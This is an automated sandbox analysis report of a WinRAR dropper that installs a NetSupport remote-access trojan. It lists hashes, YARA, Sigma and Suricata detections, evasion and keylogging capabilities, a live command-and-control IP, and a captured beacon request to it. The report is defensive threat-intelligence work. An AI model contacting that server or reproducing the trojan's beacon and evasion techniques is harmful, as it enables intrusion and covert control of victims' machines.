Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546920
MD5:b51e761b009c658073fd0dc66c8f808f
SHA1:8dd8a45980efcae93eec634987396a0a6a3e62e9
SHA256:bf2165a4bdafb0945c8b370758e6d0b9ab145147e7ddab448a01b3b25c2ad8a7
Tags:exeuser-Bitsight
Infos:

Detection

NetSupport RAT
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • file.exe (PID: 7068 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B51E761B009C658073FD0DC66C8F808F)
    • bild.exe (PID: 1456 cmdline: "C:\Users\Public\Downloads\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Downloads\bild.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Downloads\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Downloads\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Downloads\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Downloads\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000001.00000000.1666036569.0000000000F22000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 9 entries
                      SourceRuleDescriptionAuthorStrings
                      1.2.bild.exe.6ca20000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        1.2.bild.exe.f20000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          1.0.bild.exe.f20000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            1.2.bild.exe.6ca00000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              0.3.file.exe.4f04800.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                                Click to see the 6 entries

                                System Summary

                                barindex
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Downloads\bild.exe" , CommandLine: "C:\Users\Public\Downloads\bild.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Downloads\bild.exe, NewProcessName: C:\Users\Public\Downloads\bild.exe, OriginalFileName: C:\Users\Public\Downloads\bild.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7068, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\Public\Downloads\bild.exe" , ProcessId: 1456, ProcessName: bild.exe
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 185.215.113.64, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Downloads\bild.exe, Initiated: true, ProcessId: 1456, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-01T17:56:51.883908+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449732TCP
                                2024-11-01T17:57:30.205978+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449738TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-11-01T17:56:32.935205+010028277451Malware Command and Control Activity Detected192.168.2.449730185.215.113.64443TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: C:\Users\Public\Downloads\bild.exeReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Downloads\remcmdstub.exeReversingLabs: Detection: 13%
                                Source: file.exeReversingLabs: Detection: 50%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.2% probability
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,1_2_110AD570
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Downloads\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000001.00000002.3511237810.000000006C941000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000001.00000002.3511448274.000000006CA22000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: file.exe, 00000000.00000003.1663707824.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000000.1666036569.0000000000F22000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000001.00000002.3509963877.0000000000F22000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000001.00000002.3511372115.000000006CA05000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FA273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_009FA273
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0A537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A0A537
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,1_2_1102D330
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,1_2_11065890
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,1_2_1106A0A0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,1_2_111266E0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,1_2_1110AFD0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49730 -> 185.215.113.64:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 185.215.113.64 185.215.113.64
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49732
                                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49738
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.64
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.64
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.64
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://185.215.113.64/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.215.113.64Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: bild.exe, bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: bild.exe, bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: bild.exe, 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: bild.exe, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0$
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                Source: bild.exe, 00000001.00000002.3509543073.00000000007A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/es
                                Source: bild.exe, 00000001.00000002.3509543073.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: bild.exe, 00000001.00000002.3509543073.00000000007A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp(E
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: bild.exe, 00000001.00000002.3509543073.00000000007A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspX
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                Source: remcmdstub.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: file.exe, 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1663707824.00000000050DB000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: remcmdstub.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,1_2_1101F6B0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,1_2_1101F6B0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,1_2_11032EE0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,1_2_110321E0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,1_2_110076F0
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,1_2_11113880
                                Source: Yara matchFile source: 0.3.file.exe.4f04800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7068, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 1456, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Downloads\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,1_2_111158B0
                                Source: C:\Users\Public\Downloads\bild.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F7070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_009F7070
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,1_2_1115DB40
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,1_2_1102D330
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A059840_2_00A05984
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F84090_2_009F8409
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A030E60_2_00A030E6
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A1E8D40_2_00A1E8D4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FE0450_2_009FE045
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FD1D20_2_009FD1D2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0E94A0_2_00A0E94A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0FAC80_2_00A0FAC8
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FBA1A0_2_009FBA1A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F32030_2_009F3203
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0F25E0_2_00A0F25E
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A063F20_2_00A063F2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FDBE20_2_009FDBE2
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A02B3A0_2_00A02B3A
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A12B780_2_00A12B78
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A1A35E0_2_00A1A35E
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FEC970_2_009FEC97
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A02DB50_2_00A02DB5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A05DB90_2_00A05DB9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FD5E40_2_009FD5E4
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F5E960_2_009F5E96
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A19EB00_2_00A19EB0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0F6930_2_00A0F693
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0EE460_2_00A0EE46
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A04FB50_2_00A04FB5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F3FC50_2_009F3FC5
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F276C0_2_009F276C
                                Source: C:\Users\Public\Downloads\bild.exeCode function: 1_2_110733B01_2_110733B0
